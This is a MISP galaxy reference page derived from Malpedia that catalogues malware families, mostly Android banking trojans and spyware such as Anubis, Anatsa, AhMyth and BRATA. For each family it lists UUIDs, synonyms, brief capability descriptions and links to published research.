Malpedia
Malware galaxy cluster based on Malpedia.
Authors
| Authors and/or Contributors |
|---|
| Davide Arcuri |
| Alexandre Dulaunoy |
| Steffen Enders |
| Andrea Garavaglia |
| Andras Iklody |
| Daniel Plohmann |
| Christophe Vandeplas |
FastCash
Internal MISP references
UUID e8a04177-6a91-46a6-9f63-6a9fac4dfa02 which can be used as unique global reference for FastCash in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA18-275A - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf - webarchive
- https://github.com/fboldewin/FastCashMalwareDissected/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa20-239a - webarchive
- https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/ - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf - webarchive
- https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://www.youtube.com/watch?v=zGvQPtejX9w - webarchive
- https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf - webarchive
- https://doubleagent.net/fastcash-for-linux/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
888 RAT
Internal MISP references
UUID e98ae895-0831-4e10-aad1-593d1c678db1 which can be used as unique global reference for 888 RAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Aberebot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aberebot.
| Known Synonyms |
|---|
| Escobar |
Internal MISP references
UUID 4b9c0228-2bfd-4bc7-bd64-8357a2da12ee which can be used as unique global reference for Aberebot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot - webarchive
- https://hothardware.com/news/escobar-banking-trojan-targets-mfa-codes - webarchive
- https://twitter.com/icebre4ker/status/1460527428544176128 - webarchive
- https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/ - webarchive
- https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/ - webarchive
- https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AbstractEmu
According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.
Internal MISP references
UUID 57a4c8c0-140a-45e3-9166-64e3e35c5986 which can be used as unique global reference for AbstractEmu in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu - webarchive
- https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ActionSpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ActionSpy.
| Known Synonyms |
|---|
| AxeSpy |
Internal MISP references
UUID 5c7a35bf-e5f1-4b07-b93a-c3608cc9142e which can be used as unique global reference for ActionSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy - webarchive
- https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/ - webarchive
- https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AdoBot
Internal MISP references
UUID d95708e9-220a-428c-b126-a63986099892 which can be used as unique global reference for AdoBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AdultSwine
Internal MISP references
UUID 824f284b-b38b-4a57-9e4a-aee4061a5b2d which can be used as unique global reference for AdultSwine in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Agent Smith
Internal MISP references
UUID 34770e6e-e2c3-4e45-aa86-9d74b5309773 which can be used as unique global reference for Agent Smith in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AhMyth
According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.
Internal MISP references
UUID 86a5bb47-ac59-449a-8ff2-ae46e19cc6d2 which can be used as unique global reference for AhMyth in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth - webarchive
- https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/ - webarchive
- https://www.secrss.com/articles/24995 - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
- https://deform.co/hacker-group-caracal-kitten-targets-kdp-activists-with-malware/ - webarchive
- https://securelist.com/transparent-tribe-part-2/98233/ - webarchive
- https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Alien
According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alien.
| Known Synonyms |
|---|
| AlienBot |
Internal MISP references
UUID de483b10-4247-46b3-8ab5-77d089f0145c which can be used as unique global reference for Alien in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien - webarchive
- https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/ - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf - webarchive
- https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/ - webarchive
- https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets - webarchive
- https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/ - webarchive
- https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/ - webarchive
- https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html - webarchive
- https://twitter.com/CPResearch/status/1603375823448317953 - webarchive
- https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html - webarchive
- https://muha2xmad.github.io/malware-analysis/alien/ - webarchive
- https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AmexTroll
Internal MISP references
UUID 6b153952-9415-4710-8175-354b59252dbc which can be used as unique global reference for AmexTroll in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AmpleBot
This malware was initially named BlackRock and later renamed to AmpleBot.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AmpleBot.
| Known Synonyms |
|---|
| BlackRock |
Internal MISP references
UUID 2f3f82f6-ec21-489e-8257-0967c567798a which can be used as unique global reference for AmpleBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.amplebot - webarchive
- https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html - webarchive
- https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html - webarchive
- https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Anatsa
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anatsa.
| Known Synonyms |
|---|
| ReBot |
| TeaBot |
| Toddler |
Internal MISP references
UUID 147081b9-7e59-4613-ad55-bbc08141fee1 which can be used as unique global reference for Anatsa in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa - webarchive
- https://www.cleafy.com/cleafy-labs/a-stealthy-threat-uncovered-teabot-on-google-play-store - webarchive
- https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/ - webarchive
- https://twitter.com/ThreatFabric/status/1394958795508523008 - webarchive
- https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered - webarchive
- https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/ - webarchive
- https://gbhackers.com/teabot-banking-trojan/ - webarchive
- https://www.cleafy.com/cleafy-labs/teabot - webarchive
- https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368 - webarchive
- https://www.cleafy.com/documents/teabot - webarchive
- https://www.zscaler.com/blogs/security-research/android-document-readers-and-deception-tracking-latest-updates-anatsa - webarchive
- https://www.threatfabric.com/blogs/anatsa-trojan-returns-targeting-europe-and-expanding-its-reach - webarchive
- https://twitter.com/icebre4ker/status/1416409813467156482 - webarchive
- https://labs.k7computing.com/?p=22407 - webarchive
- https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/ - webarchive
- https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf - webarchive
- https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html - webarchive
- https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html - webarchive
- https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe - webarchive
- https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html - webarchive
- https://www.threatfabric.com/blogs/anatsa-hits-uk-and-dach-with-new-campaign - webarchive
- https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AndroRAT
Androrat is a remote administration tool developed in Java for Android on the client side and in Java/Swing for the server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It was developed by a team of four for a university project. The goal of the application is to give remote control of the Android system and retrieve information from it.
Internal MISP references
UUID 80447111-8085-40a4-a052-420926091ac6 which can be used as unique global reference for AndroRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat - webarchive
- https://github.com/DesignativeDave/androrat - webarchive
- https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html - webarchive
- https://www.kaspersky.com/blog/mobile-malware-part-4/24290/ - webarchive
- https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/ - webarchive
- https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat - webarchive
- https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat - webarchive
- https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset - webarchive
- https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ANDROSNATCH
According to Google, a Chrome cookie stealer.
Internal MISP references
UUID 8cd795ed-3a4d-41a3-abb1-0c3dd3aa4eab which can be used as unique global reference for ANDROSNATCH in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Antidot
The malware displays fake Google Play update pages in multiple languages, including German, French, Spanish, Russian, Portuguese, Romanian, and English, indicating potential targets in these regions.
Antidot uses overlay attacks and keylogging techniques to efficiently collect sensitive information such as login credentials.
Internal MISP references
UUID c1f3e4c7-ab9d-4cde-b5df-cbd256c0bd8e which can be used as unique global reference for Antidot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.antidot - webarchive
- https://medium.com/@mvaks/two-tales-and-one-antidot-e-a-new-mobile-malware-campaign-in-poland-de704997096f - webarchive
- https://cyble.com/blog/new-antidot-android-banking-trojan-masquerading-as-google-play-updates/ - webarchive
- https://catalyst.prodaft.com/public/report/antidot/overview - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Anubis (Android)
BleepingComputer found that Anubis will display fake phishing login forms when users open up apps for targeted platforms to steal credentials. This overlay screen will be shown over the real app's login screen to make victims think it is a legitimate login form when, in reality, the entered credentials are sent to the attackers.
In the new version spotted by Lookout, Anubis now targets 394 apps and has the following capabilities:
- Recording screen activity and sound from the microphone
- Implementing a SOCKS5 proxy for covert communication and package delivery
- Capturing screenshots
- Sending mass SMS messages from the device to specified recipients
- Retrieving contacts stored on the device
- Sending, reading, deleting, and blocking notifications for SMS messages received by the device
- Scanning the device for files of interest to exfiltrate
- Locking the device screen and displaying a persistent ransom note
- Submitting USSD code requests to query bank balances
- Capturing GPS data and pedometer statistics
- Implementing a keylogger to steal credentials
- Monitoring active apps to mimic and perform overlay attacks
- Stopping malicious functionality and removing the malware from the device
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis (Android).
| Known Synonyms |
|---|
| BankBot |
| android.bankbot |
| android.bankspy |
Internal MISP references
UUID 85975621-5126-40cb-8083-55cbfa75121b which can be used as unique global reference for Anubis (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis - webarchive
- https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ - webarchive
- https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/ - webarchive
- https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html - webarchive
- https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/ - webarchive
- https://community.riskiq.com/article/85b3db8c - webarchive
- https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/ - webarchive
- http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html - webarchive
- https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus - webarchive
- https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html - webarchive
- http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html - webarchive
- https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://0x1c3n.tech/anubis-android-malware-analysis - webarchive
- https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://pentest.blog/n-ways-to-unpack-mobile-malware/ - webarchive
- https://muha2xmad.github.io/malware-analysis/anubis/ - webarchive
- https://www.youtube.com/watch?v=U0UsfO-0uJM - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html - webarchive
- https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis - webarchive
- http://blog.koodous.com/2017/05/bankbot-on-google-play.html - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/ - webarchive
- https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AnubisSpy
Internal MISP references
UUID 06ffb614-33ca-4b04-bf3b-623e68754184 which can be used as unique global reference for AnubisSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy - webarchive
- https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Asacub
Internal MISP references
UUID dffa06ec-e94f-4fd7-8578-2a98aace5473 which can be used as unique global reference for Asacub in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ashas
Internal MISP references
UUID aabcfbb6-6385-486d-a30b-e3a2edcf493d which can be used as unique global reference for Ashas in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ATANK
According to Lukas Stefanko, this is an open-source crypto-ransomware found on GitHub in 2018. It can encrypt and decrypt files (AES, with a key of 32 random characters that is sent to the C&C), uses email as the contact point, but will remove all files after 24 hours or after a reboot.
Internal MISP references
UUID 231f9f49-6752-49af-9ee0-7774578fcbe4 which can be used as unique global reference for ATANK in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AxBanker
According to EnigmaSoft, AxBanker is a banking Trojan targeting Android devices specifically. The threatening tool has been deployed as part of large attack campaigns against users in India. The threat actors use smishing (SMS phishing) techniques to smuggle the malware threat onto the victims' devices. The fake applications carrying AxBanker are designed to visually impersonate the official applications of popular Indian banking organizations. The weaponized applications use fake promises or rewards and discounts as additional lures.
Internal MISP references
UUID 4a854e8c-d6ad-4997-8931-b27e39b7f7fa which can be used as unique global reference for AxBanker in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.axbanker - webarchive
- https://www.trendmicro.com/en_vn/research/22/k/massive-phishing-campaigns-target-india-banks-clients.html#:~:text=We%20found%20five%20banking%20malware,card%20information%20via%20phishing%20campaigns.&text=We%20observed%20an%20uptick%20in,message%20with%20a%20phishing%20link. - webarchive
- https://blog.polyswarm.io/phishing-and-android-malware-campaign-targets-indian-banks - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
badbazaar
BadBazaar is a type of malware primarily functioning as a spyware. Designed to compromise Android and iOS devices, it is often distributed through malicious apps downloaded from unofficial app stores, third-party websites, Telegram channels, and social engineering. Once installed, BadBazaar seeks to surveil the victim by intercepting SMS messages, performing screen recordings, and logging keystrokes on the device. Additionally, it can execute remote commands and download and install other malicious applications, further compromising the security of the affected device.
Internal MISP references
UUID 80b30290-40d3-4ce3-a878-2e0af4b107d8 which can be used as unique global reference for badbazaar in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.badbazaar - webarchive
- https://www.lookout.com/threat-intelligence/article/badbazaar-surveillanceware-apt15 - webarchive
- https://www.ncsc.gov.uk/news/ncsc-partners-share-guidance-for-communities-at-high-risk-of-digital-surveillance - webarchive
- https://www.ncsc.gov.uk/files/NCSC-Advisory-BADBAZAAR-and-MOONSHINE-technical-analysis-and-mitigations.pdf - webarchive
- https://www.ncsc.gov.uk/files/NCSC-Advisory-BADBAZAAR-and-MOONSHINE-guidance.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BADBOX
According to BitSight, BADBOX is a large-scale cybercriminal operation selling off-brand Android TV boxes, smartphones, and other Android electronics with preinstalled malware.
Internal MISP references
UUID b7a96690-4547-43a2-98e9-91cc56affbe4 which can be used as unique global reference for BADBOX in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.badbox - webarchive
- https://www.bleepingcomputer.com/news/security/android-tv-box-on-amazon-came-pre-installed-with-malware/ - webarchive
- https://www.badbox2serviceofprocess.com/ - webarchive
- https://www.bitsight.com/blog/badbox-botnet-back - webarchive
- https://www.bleepingcomputer.com/news/security/badbox-malware-botnet-infects-192-000-android-devices-despite-disruption/ - webarchive
- https://censys.com/unpacking-the-badbox-botnet/ - webarchive
- https://github.com/DesktopECHO/T95-H616-Malware - webarchive
- https://www.ic3.gov/PSA/2025/PSA250605#fn2 - webarchive
- https://www.bleepingcomputer.com/news/security/germany-blocks-badbox-malware-loaded-on-30-000-android-devices/ - webarchive
- https://xdaforums.com/t/owner-of-an-android-tv-box-may-want-to-check-if-its-an-active-botnet-member.4519567/ - webarchive
- https://www.humansecurity.com/learn/blog/satori-threat-intelligence-disruption-badbox-2-0/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BADCALL (Android)
A remote access tool (RAT) payload on Android devices.
Internal MISP references
UUID 5eec00de-5d81-4907-817d-f99cb33d9b66 which can be used as unique global reference for BADCALL (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BadPatch
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BadPatch.
| Known Synonyms |
|---|
| WelcomeChat |
Internal MISP references
UUID 9b96e274-1602-48a4-8e0d-9f756d4e835b which can be used as unique global reference for BadPatch in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bahamut (Android)
According to PCrisk, Bahamut is the name of Android malware with spyware functionality. Threat actors use Bahamut to steal sensitive information. The newest malware version targets various messaging apps and personally identifiable information.
Internal MISP references
UUID 4038c3bc-b559-45bb-bac1-9665a54dedf9 which can be used as unique global reference for Bahamut (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut - webarchive
- https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/ - webarchive
- https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/ - webarchive
- https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/ - webarchive
- https://www.trendmicro.com/en_us/research/18/h/the-urpage-connection-to-bahamut-confucius-and-patchwork.html - webarchive
- https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/ - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf - webarchive
- https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Basbanke
Internal MISP references
UUID c59b65d6-d363-4b19-b082-d72508e782c0 which can be used as unique global reference for Basbanke in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke - webarchive
- https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE - webarchive
- https://twitter.com/LukasStefanko/status/1280243673100402690 - webarchive
- https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BianLian (Android)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BianLian (Android).
| Known Synonyms |
|---|
| Hydra |
Internal MISP references
UUID 1faaa5c5-ab4e-4101-b2d9-0e12207d70fc which can be used as unique global reference for BianLian (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian - webarchive
- https://cryptax.medium.com/android-bianlian-payload-61febabed00a - webarchive
- https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726 - webarchive
- https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html - webarchive
- https://cryptax.medium.com/bad-zip-and-new-packer-for-android-bianlian-5bdad4b90aeb - webarchive
- https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5 - webarchive
- https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html - webarchive
- https://www.youtube.com/watch?v=DPFcvSy4OZk - webarchive
- https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56 - webarchive
- https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BingoMod
Internal MISP references
UUID 2778f61a-48e4-4585-8eff-983d5a4fd6ac which can be used as unique global reference for BingoMod in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BlankBot
Internal MISP references
UUID c4a42580-bc5e-4185-adfd-cc6ade9b8424 which can be used as unique global reference for BlankBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BoneSpy
According to Lookout, BoneSpy is based on the Russian-developed, open-source DroidWatcher surveillanceware, featuring nearly identical code, names, and log messages in multiple classes related to the handling of databases containing collected exfil data such as call logs, location tracking, SMS messages, notifications, and browser bookmarks. Class names for many entry points (receivers, activities, and services) were either the same or very similar to DroidWatcher samples.
Internal MISP references
UUID 54723362-0b25-4e84-b5ff-5e50083b0b52 which can be used as unique global reference for BoneSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BrasDex
According to PCrisk, BrasDex is a banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.
At the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.
Internal MISP references
UUID dc5408e9-e9e8-44fd-ac5c-231483d0ebe3 which can be used as unique global reference for BrasDex in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BRATA
According to Cleafy, the victim's Android device is factory reset after the attackers siphon money from the victim's bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRATA.
| Known Synonyms |
|---|
| AmexTroll |
| Copybara |
Internal MISP references
UUID d9ff080d-cde0-48da-89db-53435c99446b which can be used as unique global reference for BRATA in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata - webarchive
- https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam - webarchive
- https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account - webarchive
- https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again - webarchive
- https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html - webarchive
- https://www.threatfabric.com/blogs/toad-fraud - webarchive
- https://securelist.com/spying-android-rat-from-brazil-brata/92775/ - webarchive
- https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Brunhilda
PRODAFT describes Brunhilda as a "Dropper as a Service" for Google Play, delivering e.g. Alien.
Internal MISP references
UUID 5d3d5f52-0a55-4c81-af87-7809ce43906b which can be used as unique global reference for Brunhilda in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda - webarchive
- https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud - webarchive
- https://blog.fox-it.com/2024/03/28/android-malware-vultur-expands-its-wingspan - webarchive
- https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html - webarchive
